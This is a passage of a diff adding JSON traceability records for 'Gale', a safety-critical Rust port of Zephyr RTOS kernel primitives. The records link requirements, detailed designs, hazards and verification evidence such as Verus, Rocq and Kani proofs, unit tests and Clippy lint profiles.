+      "description": "Verus annotations present in src/poll.rs with requires/ensures clauses targeting poll properties (PL01-PL08). Proof lemmas need fixing (exec-in-proof calls). Not yet passing verification. Executed via: bazel test //:verus_test\n",
+      "id": "FV-PL-001",
+      "links": [
+        {
+          "target": "SWREQ-PL-PL01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PL-PL08",
+          "type": "verifies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Poll Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unit tests in src/spinlock.rs covering init, acquire (free/held), acquire_nested (same/different owner, max depth), release (owner/non-owner, nested), is_held, is_free, and owner queries.\n",
+      "id": "UV-SL-001",
+      "links": [
+        {
+          "target": "SWDD-SL-ACQUIRE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SL-RELEASE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Spinlock unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The check function reads the current signaled flag and result value, returning them as a consistent pair. Maps to poll.c:501-515.\n",
+      "id": "SWREQ-PL-PL06",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "signal",
+        "check",
+        "asil-d"
+      ],
+      "title": "PL6: signal_check reads signaled and result atomically",
+      "type": "sw-req"
+    },
+    {
+      "description": "When there are threads waiting on the semaphore, the highest-priority waiting thread shall be unblocked and acquire the semaphore.\n",
+      "id": "ZEP-SRS-5-14",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore release with priority inheritance",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The wait queue maintains priority ordering (numerically lowest priority value = highest priority) at all times.  Threads are woken strictly in priority order.\n",
+      "id": "SWREQ-SEM-P10",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-14",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "wait-queue",
+        "ordering",
+        "asil-d"
+      ],
+      "title": "P10: wait queue ordering preserved across all operations",
+      "type": "sw-req"
+    },
+    {
+      "description": "When get is called and the queue is not empty, used_msgs decrements by 1 and read_idx advances to the next ring buffer slot. Maps to msg_q.c:280-349.\n",
+      "id": "SWREQ-MQ-MQ08",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "get",
+        "asil-d"
+      ],
+      "title": "MQ8: get on non-empty queue decrements used_msgs, advances read_idx",
+      "type": "sw-req"
+    },
+    {
+      "description": "When put_front is called and the queue is not full, used_msgs increments by 1 and read_idx retreats to the previous ring buffer slot. Maps to msg_q.c:236-239.\n",
+      "id": "SWREQ-MQ-MQ07",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "put-front",
+        "asil-d"
+      ],
+      "title": "MQ7: put_front on non-full queue retreats read_idx correctly",
+      "type": "sw-req"
+    },
+    {
+      "description": "When the active sector has at least (ATE header size + data payload size) bytes of free space, the write operation completes with exactly two flash write operations (one for ATE header, one for data) and does not invoke garbage collection.  This guarantees O(1) flash operations for the common-case write path.\n",
+      "id": "SWREQ-ZMS-P05",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "write",
+        "bounded",
+        "deterministic",
+        "asil-d"
+      ],
+      "title": "P5: Write with sufficient free space completes without GC (O(1) flash ops)",
+      "type": "sw-req"
+    },
+    {
+      "description": "When get is called and the queue is empty, returns -ENOMSG without modifying the queue state. Maps to msg_q.c:280-349.\n",
+      "id": "SWREQ-MQ-MQ09",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "get",
+        "error",
+        "asil-d"
+      ],
+      "title": "MQ9: get on empty queue returns ENOMSG, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "Purge clears all messages, setting used_msgs to 0 and aligning read_idx with write_idx. Maps to msg_q.c:443-470.\n",
+      "id": "SWREQ-MQ-MQ11",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "purge",
+        "asil-d"
+      ],
+      "title": "MQ11: purge resets to empty (used_msgs=0, read_idx=write_idx)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall maintain a status counter for each timer that is incremented on each expiration and atomically read-and-reset via k_timer_status_get.\n",
+      "id": "ZEP-SRS-TM-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TM",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timer"
+      ],
+      "title": "Zephyr: Timer Status Counting",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Set event type and state = K_POLL_STATE_NOT_READY.\n",
+      "id": "SWDD-PL-INIT",
+      "links": [
+        {
+          "target": "SWARCH-PL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PL-PL01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "init"
+      ],
+      "title": "PollEvent::init — k_poll_event_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random signal/broadcast/wait operation sequences on condvar. Coverage-guided mutation testing.\n",
+      "id": "UV-CV-005",
+      "links": [
+        {
+          "target": "SWDD-CV-SIGNAL",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-BROADCAST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "CondVar fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "A spinlock can only be released by the thread that currently holds it. Non-owner release returns EPERM.\n",
+      "id": "SWREQ-SL-SL02",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "release",
+        "asil-d"
+      ],
+      "title": "SL2: release only by current owner",
+      "type": "sw-req"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/mutex_proofs.v targeting mutex invariant preservation (ownership correspondence, reentrant depth, lock/unlock roundtrip, ownership transfer) via theorem proving on the coq_of_rust translation of plain Rust code. Independent verification path from Verus. Executed via: bazel test //proofs:mutex_proofs_test\n",
+      "id": "FV-MUT-002",
+      "links": [
+        {
+          "target": "SWREQ-MUT-M01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M09",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Mutex Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all FIFO code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-FI-003",
+      "links": [
+        {
+          "target": "SWREQ-FI-FI01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "FIFO Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all LIFO code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-LI-003",
+      "links": [
+        {
+          "target": "SWREQ-LI-LI01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "LIFO Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unit tests in src/work.rs covering init (idle), submit (idle/queued/ canceling/running), start_running, finish_running, cancel, finish_cancel, busy_get, is_idle/is_queued/is_running/is_canceling.\n",
+      "id": "UV-WK-001",
+      "links": [
+        {
+          "target": "SWDD-WK-SUBMIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Work unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/mempool.rs with requires/ensures clauses that formally verify mem pool properties (MP1-MP6) via SMT solving. Proves alloc/free safety, total_size overflow detection, fill-drain roundtrip, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-MP-001",
+      "links": [
+        {
+          "target": "SWREQ-MP-MP01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MP-MP02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MP-MP03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MP-MP04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MP-MP05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MP-MP06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "MemPool Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Adding a thread to the run queue makes it eligible for selection by next_up. Maps to sched.c:80-87.\n",
+      "id": "SWREQ-SC-SC01",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "runq",
+        "asil-d"
+      ],
+      "title": "SC1: runq_add inserts thread into run queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full Zephyr kernel thread lifecycle test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_THREAD=y. Tests exercise k_thread_create, k_thread_abort, k_thread_join, and state transitions through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/threads/thread_apis.\n",
+      "id": "SV-TL-001",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Thread Lifecycle Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Block the calling thread and insert it into the wait queue in priority order. Called when mutex is owned by another thread and timeout is not K_NO_WAIT.\n",
+      "id": "SWDD-MUT-LOCK-BLOCKING",
+      "links": [
+        {
+          "target": "SWARCH-MUT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MUT-M05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M11",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MUT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "lock",
+        "blocking"
+      ],
+      "title": "Mutex::lock_blocking — z_impl_k_mutex_lock blocking port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "A counting semaphore that matches the Zephyr k_sem API semantics: initialization with count and limit, give (signal), take (wait), and reset.  Must maintain priority-ordered wait queue for blocked threads and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-SEM-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "kernel"
+      ],
+      "title": "Counting semaphore with init/give/take/reset",
+      "type": "system-req"
+    },
+    {
+      "description": "Timer status counter model with init/start/stop/expire/status_get. Tracks status (u32), period (u32), and running (bool) for timer lifecycle validation. Actual timeout scheduling stays in C — Gale verifies status arithmetic and mode logic only. No unsafe code.\n",
+      "id": "SWARCH-TM-001",
+      "links": [
+        {
+          "target": "SWREQ-TM-TM01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TM-TM02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TM-TM05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "architecture"
+      ],
+      "title": "Timer module (gale::timer)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Integration tests exercising atomic operation sequences including add-sub roundtrips, CAS retry patterns, and xor self-inverse.\n",
+      "id": "IV-AT-001",
+      "links": [
+        {
+          "target": "SWARCH-AT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Atomic integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Two complementary evidence sources for deadlock freedom. FV-MUT-002: Rocq (Coq) theorem proofs of mutex ownership-transfer and forward-progress invariants.  FV-CV-002: Rocq proofs of condvar wait/notify protocol correctness.  FV-TRACTOR-EQ: Kani bounded model checking exhaustively explores state spaces for mutex+condvar interactions within a bounded number of threads.\n",
+      "id": "Sn-3",
+      "links": [
+        {
+          "target": "G-4",
+          "type": "supports"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "formal-verification",
+        "rocq",
+        "kani"
+      ],
+      "title": "Rocq theorem proofs and Kani BMC for deadlock freedom",
+      "type": "safety-solution"
+    },
+    {
+      "description": "Initialize thread struct, set priority, configure options (essential, user, inherit_perms), prepare stack and arch context. C source: kernel/thread.c lines 579-720.\n",
+      "id": "SWDD-TL-SETUP",
+      "links": [
+        {
+          "target": "SWARCH-TL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TL-TH02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TL-TH06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "setup"
+      ],
+      "title": "ThreadLifecycle::setup — z_setup_new_thread port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests in tests/mem_slab_integration.rs exercising the full mem_slab API surface across module boundaries. Tests init validation, alloc/free operations, full/empty boundaries, roundtrip, fill-drain, conservation invariant, interleaved operations, and stress cycles.\n",
+      "id": "IV-MS-001",
+      "links": [
+        {
+          "target": "SWARCH-MS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "MemSlab integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Integration tests exercising fault register decode across various CFSR/HFSR combinations.\n",
+      "id": "IV-FD-001",
+      "links": [
+        {
+          "target": "SWARCH-FD-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "FaultDecode integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Zephyr dynamic thread creation test suite executed on qemu_cortex_m3 with CONFIG_DYNAMIC_THREAD=y. Tests exercise k_thread_create with stack pool allocation, bounded active threads, and proper cleanup with Gale integration. Test suite: zephyr/tests/kernel/threads/dynamic_thread.\n",
+      "id": "SV-DY-001",
+      "links": [
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Dynamic Thread Creation Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's memory slab allocator. Contains k_mem_slab_init, z_impl_k_mem_slab_alloc, z_impl_k_mem_slab_free, plus userspace wrappers and statistics. The Gale port models the block counter only — actual memory management stays in C.\n",
+      "id": "PROV-MS-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "mem-slab",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/mem_slab.c — memory slab allocator implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "When the buffer is full (size == capacity), put returns EAGAIN without modifying state.\n",
+      "id": "SWREQ-RB-RB05",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "put",
+        "asil-d"
+      ],
+      "title": "RB5: put on full buffer returns error",
+      "type": "sw-req"
+    },
+    {
+      "description": "Monitoring subsystems (thread_monitor, usage, obj_core, spinlock_validate) are excluded from the Gale safety perimeter. This follows industry practice (AUTOSAR, seL4, RTEMS safety profiles) where diagnostic code is not part of the certified kernel.  The exclusion is enforced by Kconfig: disabling CONFIG_THREAD_MONITOR, CONFIG_SCHED_THREAD_USAGE, CONFIG_OBJ_CORE, CONFIG_SPIN_VALIDATE removes the code entirely.  These 4 files (933 lines) are purely observational — they read kernel state but never modify synchronization or scheduling decisions.\n",
+      "id": "SWARCH-MON-001",
+      "links": [
+        {
+          "target": "SWREQ-MON-M01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MON-M02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-TRIV-T01",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "monitoring",
+        "exclusion",
+        "architecture"
+      ],
+      "title": "Monitoring exclusion architecture",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all work code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-WK-003",
+      "links": [
+        {
+          "target": "SWREQ-WK-WK01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Work Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of msgq init validation, put/get/put_front invariant preservation, peek_at slot computation, purge reset, ring consistency across operation sequences, and fill-drain roundtrip within bounded state space.\n",
+      "id": "UV-MQ-003",
+      "links": [
+        {
+          "target": "SWDD-MQ-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT-FRONT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-GET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PEEK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PURGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "MsgQ Kani bounded model checking",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all mempool code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-MP-003",
+      "links": [
+        {
+          "target": "SWREQ-MP-MP01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "MemPool Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When get is called and count > 0, count decrements by 1 and returns OK. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-FI-FI03",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FI-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "get",
+        "asil-d"
+      ],
+      "title": "FI3: get when not empty decrements count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "At every scheduling point the kernel must select the thread with the numerically highest priority (lowest priority number) among all threads in the READY state.  Formally proven by FV-SC-004 (Lean 4 scheduling theory) and verified by FV-MUT-001/FV-SEM-001 Verus proofs that scheduling-point invariants hold.\n",
+      "id": "SC-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-SC-SC03",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "scheduling"
+      ],
+      "title": "Scheduler must always return highest-priority ready thread",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The scheduler returns a thread that is not the highest-priority ready thread, causing a lower-priority thread to run in place of a safety-critical one.  In a worst-case environment (time-critical safety function pending) this leads to L-1.\n",
+      "id": "H-1",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "scheduling"
+      ],
+      "title": "Kernel provides incorrect thread scheduling decision",
+      "type": "hazard"
+    },
+    {
+      "description": "The Zephyr RTOS shall define the maximum limit of a semaphore when the semaphore is used for counting purposes and does not have an explicit limit.\n",
+      "id": "ZEP-SRS-5-3",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Maximum limit of a semaphore",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The wake function returns the count of threads actually removed from the wait queue and made ready. Maps to futex.c:27-57.\n",
+      "id": "SWREQ-FX-FX03",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FX-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wake",
+        "asil-d"
+      ],
+      "title": "FX3: wake returns number of threads woken",
+      "type": "sw-req"
+    },
+    {
+      "description": "No arithmetic operation on thread priorities, stack sizes, or option flags causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-TL-TH06",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "TH6: no overflow in thread priority or stack arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "The storage subsystem shall tolerate arbitrary power loss at any point during operation without corrupting previously committed data. After power is restored, the subsystem shall recover to a consistent state containing all successfully committed writes.  This is mandatory for automotive ECUs subject to uncontrolled power cycling (e.g., battery disconnect, crash events, key-off during write).\n",
+      "id": "STKH-ZMS-003",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "power-loss",
+        "crash-consistency",
+        "storage"
+      ],
+      "title": "Power-loss resilience (no data corruption)",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Define WebAssembly Component Model (WIT) interfaces for each kernel object type: semaphore (resource sem), mutex, condvar, message queue. Each interface specifies the operations, error types, and capability requirements.  These WIT definitions are the contract between application components and the Kiln runtime.\n",
+      "id": "SWREQ-KILN-001",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "wit",
+        "component-model",
+        "interface"
+      ],
+      "title": "WIT interfaces for kernel objects",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide an unbounded queue backed by a linked list, supporting append, prepend, and get operations.\n",
+      "id": "ZEP-SRS-QU-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-QU",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-QU-QU01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-QU-QU02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "queue"
+      ],
+      "title": "Zephyr: Queue Unbounded Linked-List",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "raise: set signaled = true, result = value. reset: set signaled = false, result = 0.\n",
+      "id": "SWDD-PL-SIGNAL",
+      "links": [
+        {
+          "target": "SWARCH-PL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PL-PL04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PL-PL05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PL-PL08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "signal"
+      ],
+      "title": "PollSignal::raise/reset — z_impl_k_poll_signal_raise/reset port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "z_setup_new_thread initializes the thread struct, sets priority, configures thread options (essential, user, inherit_perms), sets up the stack, and prepares architecture-specific context. Maps to thread.c:579-720.\n",
+      "id": "SWREQ-TL-TH02",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TL-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "setup",
+        "asil-d"
+      ],
+      "title": "TH2: setup_new_thread configures base fields and arch state",
+      "type": "sw-req"
+    },
+    {
+      "description": "Supervisor-mode threads always pass access checks regardless of permission bits.\n",
+      "id": "SWREQ-US-US05",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "supervisor",
+        "asil-d"
+      ],
+      "title": "US5: supervisor mode bypasses permission checks",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall schedule threads based on priority, always selecting the highest-priority ready thread for execution via the run queue.\n",
+      "id": "ZEP-SRS-SC-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-SC",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "sched"
+      ],
+      "title": "Zephyr: Priority-Based Scheduling",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Guard num * size against overflow via size_mul_overflow. If safe, allocate and memset to zero. Return NULL on overflow or alloc failure. C source: kernel/kheap.c lines 157-174.\n",
+      "id": "SWDD-KH-CALLOC",
+      "links": [
+        {
+          "target": "SWARCH-KH-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-KH-KH04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-KH-KH06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-KH-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "calloc",
+        "overflow"
+      ],
+      "title": "KHeap::calloc — k_heap_calloc port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's kernel heap allocator. Contains k_heap_init, z_heap_alloc_helper, k_heap_alloc, k_heap_aligned_alloc, k_heap_calloc, k_heap_realloc, k_heap_free. The Gale port models the allocation state machine and overflow-safe size computation only — actual sys_heap management and spinlocks stay in C.\n",
+      "id": "PROV-KH-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "kheap",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/kheap.c — kernel heap allocator implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Fatal error classification model with classify/from_code/is_panic. Maps reason codes to recovery actions based on context and mode. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-FT-001",
+      "links": [
+        {
+          "target": "SWREQ-FT-FT01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FT-FT02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-FT-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "architecture"
+      ],
